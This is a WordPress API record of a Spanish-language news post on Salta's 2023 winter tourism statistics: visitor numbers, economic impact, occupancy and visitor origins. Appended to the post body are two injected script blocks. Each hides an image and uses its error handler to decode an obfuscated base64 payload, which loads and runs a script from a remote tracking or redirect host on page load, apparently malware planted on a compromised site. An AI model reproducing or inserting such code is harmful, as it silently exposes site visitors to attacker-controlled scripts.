{"id":2924,"date":"2023-07-31T18:20:01","date_gmt":"2023-07-31T21:20:01","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2924"},"modified":"2025-08-14T00:11:37","modified_gmt":"2025-08-14T03:11:37","slug":"el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2924","title":{"rendered":"El turismo gener\u00f3 un impacto de 30 mil millones durante las vacaciones de invierno"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#a2082e\"><em>Durante la temporada visitaron la Provincia un total de 230.461 turistas lo que implic\u00f3 un impacto econ\u00f3mico total de $30.009.479.115. Comparando id\u00e9ntica temporada pero del periodo 2022 se registra un crecimiento del 26% en lo que respecta a la actividad tur\u00edstica.<\/em><\/h4>\n\n\n\n<p>El ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;present\u00f3 junto al vicegobernador&nbsp;<strong>Antonio Marocco<\/strong>&nbsp;y el equipo del Destino Salta, los n\u00fameros relacionados con la cantidad de turistas que visitaron Salta y el impacto econ\u00f3mico. Participaron de la presentaci\u00f3n C\u00e1maras y Asociaciones empresarias del sector tur\u00edstico.<\/p>\n\n\n\n<p>Pe\u00f1a destac\u00f3 la exitosa temporada de vacaciones de julio ya que visitaron la provincia un total de 230.461 turistas que implic\u00f3 un impacto econ\u00f3mico total de 30.009.479.115 pesos e inform\u00f3 que en el mismo per\u00edodo 2022 visitaron Salta 183.508 lo que implica que el turismo creci\u00f3 en un 26%.<\/p>\n\n\n\n<p>Al respecto, el funcionario indic\u00f3 que este aumento se ve favorecido por la amplia conectividad de la Provincia lo que facilita la llegada de turistas nacionales e internacionales. En este aspecto se destacans el vuelo directo a San Pablo y que, a partir de diciembre se suma Latam con la ruta a\u00e9rea que conectar\u00e1 a Salta con Lima. Adem\u00e1s, indic\u00f3 que el Previaje benefici\u00f3 a Salta que fue la primera provincia en el ranking de los elegidos en el pa\u00eds.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8195-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8195-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg\" alt=\"El turismo gener\u00f3 un impacto de 30 mil millones durante las vacaciones de invierno\" width=\"275\" height=\"183\"\/><\/a><\/figure><\/div>\n\n\n<p>Por otra parte, indic\u00f3 que el trabajo en promoci\u00f3n en el sur del pa\u00eds ha convertido a la Patagonia en un mercado prioritario; asimismo, los vuelos directos con esta regi\u00f3n del pa\u00eds favorecieron la llegada de turistas del sur argentino. \u00abTodas estas acciones son el resultado de la decisi\u00f3n del gobernador de invertir en infraestructura, de favorecer el trabajo con el sector privado y de federalizar las oportunidades que el turismo brinda a todos los actores de su cadena productiva\u00bb, destac\u00f3 el Ministro.&nbsp;<\/p>\n\n\n\n<p>En tanto, el vicegobernador Antonio Marocco resalt\u00f3 los n\u00fameros de la temporada tur\u00edstica que significan trabajo para los salte\u00f1os e indic\u00f3 que se vio en las calles, en los lugares de gastronom\u00eda la gran cantidad de visitantes.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8196-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8196-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg\" alt=\"El turismo gener\u00f3 un impacto de 30 mil millones durante las vacaciones de invierno\" width=\"279\" height=\"186\"\/><\/a><\/figure><\/div>\n\n\n<p>El presidente de la C\u00e1mara de Turismo Juan Lucero se refiri\u00f3 a la importancia de la promoci\u00f3n tur\u00edstica de manera conjunta sector p\u00fablico y privado y lo que tiene que ofrecer la provincia como atractivos; por su parte, la presidente de AHT, Mariana Farjat, se refiri\u00f3 la excelente respuesta del sector &nbsp;privado a la y la amplia oferta.<\/p>\n\n\n\n<p>Participaron del encuentro, la secretaria de Turismo Nadia Loza, subsecretaria de Promoci\u00f3n Laura Alcorta; el presidente de Salta Convention and Visitor Bureau Daniel Astorga, Mar\u00eda Eugenia Cornejo Directora Ejecutiva INPROTUR, L\u00eda Rivella, presidenta de ASAT y Juan Chib\u00e1n vicepresidente de la C\u00e1mara Hotelera y Gastron\u00f3mica.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8197-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8197-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg\" alt=\"El turismo gener\u00f3 un impacto de 30 mil millones durante las vacaciones de invierno\" width=\"352\" height=\"234\"\/><\/a><\/figure><\/div>\n\n\n<p><strong>Estad\u00edstica<\/strong><\/p>\n\n\n\n<p>La secretaria de Turismo Nadia Loza present\u00f3 las estad\u00edsticas e indic\u00f3 que el total provincial de tasa de ocupaci\u00f3n fue del 82% y explic\u00f3 que desagregado en Ciudad de Salta hubo un 87%, en Destinos Cercanos (San Lorenzo, Vaqueros, La Caldera) 79%; principales destinos (Cafayate, Molinos Cnel. Moldes, San Antonio de los Cobres, San Carlos, Seclant\u00e1s y Rosario de la Frontera) 80% y resto de la provincia un 50%.<\/p>\n\n\n\n<p>En cuanto al perfil del turismo indic\u00f3 que el viaje en familia representa el 42%, en pareja 32%, en grupo de amigos 19% y solo\/a 7%. En cuanto al origen, 87% nacional y 13% extranjero; asimismo, la Secretaria de Turismo se\u00f1al\u00f3 que Buenos Aires y Provincia de Buenos Aires representan m\u00e1s del 50% y destac\u00f3 que desde la Regi\u00f3n Sur, el turismo patag\u00f3nico crece favorecido por los vuelos a Neuqu\u00e9n y Bariloche; adem\u00e1s, se\u00f1al\u00f3 que 15 &nbsp;mil salte\u00f1os viajaron por su provincia.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8198-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8198-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg\" alt=\"El turismo gener\u00f3 un impacto de 30 mil millones durante las vacaciones de invierno\" width=\"283\" height=\"189\"\/><\/a><\/figure><\/div>\n\n\n<p>Los visitantes tienen un promedio de pernocte de 5 noches, en cuanto al gasto promedio diario se calcula en $26.043 por turista cuya procedencia del mercado internacional fue del 67% &nbsp;al mercado regional encabezado por Brasil con un 26.8% seguido por Uruguay con 21.4% y Francia 8%; y seguido por el europeo. En cuanto a la procedencia de los turistas nacionales por regi\u00f3n registra un 53.9% de Buenos Aires; 12.1% del Noroeste; 12% del Litoral; 10.6% Patagonia, 6.2% Cuyo y 5.3% Centro.<\/p>\n\n\n\n<p>Entre las atracciones m\u00e1s visitadas, el Telef\u00e9rico San Bernardo cont\u00f3 con 51581 usuarios y el Tren a Las Nubes 14.292; el Aeropuerto Salta recibi\u00f3 138.971 y la Terminal Salta de \u00f3mnibus tuvo un movimiento de 6.857 colectivos.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Galer\u00eda de Fotos<\/h2>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"872\" height=\"600\" data-id=\"2925\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4011-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg\" alt=\"\" class=\"wp-image-2925\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4011-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg 872w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4011-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-300x206.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4011-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-768x528.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4011-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-218x150.jpeg 218w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4011-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-696x479.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4011-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-610x420.jpeg 610w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4011-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-100x70.jpeg 100w\" sizes=\"(max-width: 872px) 100vw, 872px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2927\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4009-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg\" alt=\"\" class=\"wp-image-2927\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4009-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4009-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4009-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4009-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4009-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-630x420.jpeg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2928\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4010-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg\" alt=\"\" class=\"wp-image-2928\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4010-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno.jpeg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4010-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4010-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4010-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/4010-el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-630x420.jpeg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-turismo-genero-un-impacto-de-30-mil-millones-durante-las-vacaciones-de-invierno-90954\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Durante la temporada visitaron la Provincia un total de 230.461 turistas lo que implic\u00f3 un impacto econ\u00f3mico total de $30.009.479.115. Comparando id\u00e9ntica temporada pero del periodo 2022 se registra un crecimiento del 26% en lo que respecta a la actividad tur\u00edstica. El ministro de Turismo y Deportes&nbsp;Mario Pe\u00f1a&nbsp;present\u00f3 junto al vicegobernador&nbsp;Antonio Marocco&nbsp;y el equipo del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2926,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-2924","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2924"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2924"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2924\/revisions"}],"predecessor-version":[{"id":7009,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2924\/revisions\/7009"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2926"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2924"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2924"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2924"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}